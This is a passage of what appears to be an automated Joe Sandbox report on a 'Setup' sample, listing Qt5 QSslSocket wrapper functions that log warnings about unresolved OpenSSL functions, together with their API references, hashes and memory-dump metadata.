                                                                                                                                                              • Opcode ID: bf150aa025e67a7ad39b7ae4fdec484d9d7ac0f5442a604261796fca479f698d
                                                                                                                                                              • Instruction ID: 20adfca39005e35b9ddb23fc334adab2dc17041d503e0ce39c37870eea0ac187
                                                                                                                                                              • Opcode Fuzzy Hash: bf150aa025e67a7ad39b7ae4fdec484d9d7ac0f5442a604261796fca479f698d
                                                                                                                                                              • Instruction Fuzzy Hash: F511C4F5A0E68292EB929F24E8501A52760FF54794F804136DE2D466A4EF3CE949CF04
                                                                                                                                                              Function 00007FFBA1A34A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45996), ref: 00007FFBA1A34A38
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45996), ref: 00007FFBA1A34A5D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45996), ref: 00007FFBA1A34A74
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_free
                                                                                                                                                              • API String ID: 646154281-4066756980
                                                                                                                                                              • Opcode ID: 6ab54d4bdb6eb06b153edc7d54956c79da7ecbeaddd9873eccf30574e5387e61
                                                                                                                                                              • Instruction ID: 55586fff46d073d15fee157e0d83799719f07d6df773fffbc241f578b30c9822
                                                                                                                                                              • Opcode Fuzzy Hash: 6ab54d4bdb6eb06b153edc7d54956c79da7ecbeaddd9873eccf30574e5387e61
                                                                                                                                                              • Instruction Fuzzy Hash: 7AF09095F1EA8281EBD3AB75E8012A43752BF84B14F808137DE6D4B321EE2C95168E00
                                                                                                                                                              Function 00007FFBA1A33980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40892,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A33998
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40892,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A339BD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40892,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A339D4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$RSA_free
                                                                                                                                                              • API String ID: 646154281-2186402356
                                                                                                                                                              • Opcode ID: e44db93a37d6a108f2f3b2b2f4a6a2d42c32f9c060d3e382e6734aceb1926975
                                                                                                                                                              • Instruction ID: a6823321a3f50919b6d7c638b990bf6a16c9aee7b5b646c9c6d5f62876a341a0
                                                                                                                                                              • Opcode Fuzzy Hash: e44db93a37d6a108f2f3b2b2f4a6a2d42c32f9c060d3e382e6734aceb1926975
                                                                                                                                                              • Instruction Fuzzy Hash: 26F09095F0EA8281EBD3AB75E8126A43752AF80B10F809137DD6D4B321FE2CD5598E00
                                                                                                                                                              Function 00007FFBA1A31BC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F8D), ref: 00007FFBA1A31BD8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F8D), ref: 00007FFBA1A31BFD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F8D), ref: 00007FFBA1A31C14
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EVP_PKEY_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-955281867
                                                                                                                                                              • Opcode ID: 5ab0c8254134e69405eb13301eb5c1c820b9c435843888a734ef2004a75e6df1
                                                                                                                                                              • Instruction ID: 7cd60ecc3c08c27e443c0361fab6377a23575fec0c04549bd7374c7ca75b78d3
                                                                                                                                                              • Opcode Fuzzy Hash: 5ab0c8254134e69405eb13301eb5c1c820b9c435843888a734ef2004a75e6df1
                                                                                                                                                              • Instruction Fuzzy Hash: 3AF09695F0EA9281EFC3A775E8112B43352BF80B10F404037DD6D47321EE2C95558E00
                                                                                                                                                              Function 00007FFBA1A32DB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EF44), ref: 00007FFBA1A32DC8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EF44), ref: 00007FFBA1A32DED
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EF44), ref: 00007FFBA1A32E04
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: OPENSSL_sk_pop_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1327355536
                                                                                                                                                              • Opcode ID: 1ad36b80fdffce9302242757fc2864b28e7631a9652fde64786214fac630ea7d
                                                                                                                                                              • Instruction ID: 5195db5b5e748c68810e0a9bb86972e0f4ff74685a9b69c0588342abc24758db
                                                                                                                                                              • Opcode Fuzzy Hash: 1ad36b80fdffce9302242757fc2864b28e7631a9652fde64786214fac630ea7d
                                                                                                                                                              • Instruction Fuzzy Hash: 0BF09095E0EA8281EFC3AB75E8122B43652BF80B10F809037DD6D0B321EE2CA0168E00
                                                                                                                                                              Function 00007FFBA1A31610 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408B1,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31628
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408B1,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A3164D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408B1,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31664
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: DSA_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-3554305600
                                                                                                                                                              • Opcode ID: d9c0cddba7a9659ecad790f9eff46828bb1ca028b68d34b896b4f19f2dbfdf5f
                                                                                                                                                              • Instruction ID: eb74df77524c7d4f786839512daf0f68c5c9ba685c54d85826e18b2a2b2abf76
                                                                                                                                                              • Opcode Fuzzy Hash: d9c0cddba7a9659ecad790f9eff46828bb1ca028b68d34b896b4f19f2dbfdf5f
                                                                                                                                                              • Instruction Fuzzy Hash: BFF090A5E0EA8281EFC3AB75E8116A43352BF81B10F808037DD6D0B321FE2C90198E00
                                                                                                                                                              Function 00007FFBA1A364D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A364E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A3650D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A36524
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_free
                                                                                                                                                              • API String ID: 646154281-3017237637
                                                                                                                                                              • Opcode ID: 1dd020f31f69144db8f3ab5b5b1a140653d7746cadd650af0285bdb78e9b8dd8
                                                                                                                                                              • Instruction ID: 6cae322809f72c867c08c1ca18e7559f1fd76c63d7a51785c6749c44e09b4eb6
                                                                                                                                                              • Opcode Fuzzy Hash: 1dd020f31f69144db8f3ab5b5b1a140653d7746cadd650af0285bdb78e9b8dd8
                                                                                                                                                              • Instruction Fuzzy Hash: D9F09095F0EA8281EBD3AB75E8112A53352BF84B10F808037DE6D4B361EE2C91198E00
                                                                                                                                                              Function 00007FFBA1A314C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408D0,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A314D8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408D0,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A314FD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408D0,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31514
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: DH_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-2990544216
                                                                                                                                                              • Opcode ID: 96a713ee62ad9642c3781879821c1f6dc6fa48b2ed8a5710b30f4a8d6efebba9
                                                                                                                                                              • Instruction ID: c9a66c7c62d9c1955a2d557b95f6f8ddc372c1c3cd3d95601188657851e53c54
                                                                                                                                                              • Opcode Fuzzy Hash: 96a713ee62ad9642c3781879821c1f6dc6fa48b2ed8a5710b30f4a8d6efebba9
                                                                                                                                                              • Instruction Fuzzy Hash: 3BF0BB95F0EA8281EFC3AB75E8011A53352BF80B10F848037DD6D47361FE2CD1198E00
                                                                                                                                                              Function 00007FFBA1A31840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408EF,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31858
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408EF,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A3187D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408EF,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31894
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EC_KEY_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1093401952
                                                                                                                                                              • Opcode ID: e149f3c75580ae58fcfe34d1bf3a7d3d567d79cc4af0687a0591c0b267a79dbb
                                                                                                                                                              • Instruction ID: 064a4634ad97764dccf519be6f161dce4c5c4fdd56cee03092f1a7cfa863b5b3
                                                                                                                                                              • Opcode Fuzzy Hash: e149f3c75580ae58fcfe34d1bf3a7d3d567d79cc4af0687a0591c0b267a79dbb
                                                                                                                                                              • Instruction Fuzzy Hash: 40F09095F0EA8281EBD3AB75E8016A83752BF80B10F808037DD6D4B321FE2C91158E00
                                                                                                                                                              Function 00007FFBA1A33A60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A33A78
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A33A9D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A33AB4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_CIPHER_get_bits
                                                                                                                                                              • API String ID: 646154281-54262349
                                                                                                                                                              • Opcode ID: 5dc9db68ac91c55607b06dc2b95d3512ff84ddd8c056768867bec85d2ade2f75
                                                                                                                                                              • Instruction ID: 42a8148aa26820bfc1b67cf745f2192f9b1dbd0cb66dc5a8b01b27331109e6f8
                                                                                                                                                              • Opcode Fuzzy Hash: 5dc9db68ac91c55607b06dc2b95d3512ff84ddd8c056768867bec85d2ade2f75
                                                                                                                                                              • Instruction Fuzzy Hash: 4AF09095F0EB9281EBC3AB71E8016A53392AF84B10F409037DD6D4B321FE2CD0468E00
                                                                                                                                                              Function 00007FFBA1A309D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41051), ref: 00007FFBA1A309E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41051), ref: 00007FFBA1A30A0D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41051), ref: 00007FFBA1A30A24
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
